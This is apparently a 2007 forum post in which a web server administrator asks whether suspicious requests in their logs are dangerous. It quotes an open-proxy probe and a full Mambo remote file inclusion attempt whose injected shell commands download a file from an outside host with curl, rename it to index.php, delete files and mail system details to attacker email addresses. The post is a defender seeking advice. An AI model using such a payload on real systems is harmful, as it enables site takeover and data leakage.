I have been looking at the logs for my various webservers and have noticed some "polling" going on that looks suspicious:
I have had one server up for about 3days now on 8080 and roughly every hour I recieve a request like: (note: that is not my domain, someone entered that themselves)
"GET http://hacker.org.ru/prxjdg.php"
yes, with the http in there and everything. That server is created of my own hand so I know exactly how it handles it.
So then I thought to check my iis server on port 80, and it's got wierder requests.
A common offending line: (I have nothing called mamba....)
-
2007-06-04 21:14:23 W3SVC1 x.x.x.x GET /mambo/index2.php _REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://qoo-pon.com/css/style?&cmd=cd%20cache;curl%20-O%20http://qoo-pon.com/css/style;mv%20cm%20index.php;rm%20-rf%20cm*;uname%20-a%20|%20mail%20-s%2074.92.34.25/mambo/_uname_i2%20ursu1cc@gmail.com;uname%20-a%20|%20mail%20-s%20uname_i2_74.92.34.25%20politia112_inactiune@yahoo.com;echo| 80 - 69.219.112.137 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;) 404 0 3
-
Should I be worried about this? IIS is returning 404 errors for it, but is there harm in these things?
Any thoughts?
Thanks
PS: If this is the wrong place to post, feel free to move it to where it needs to be
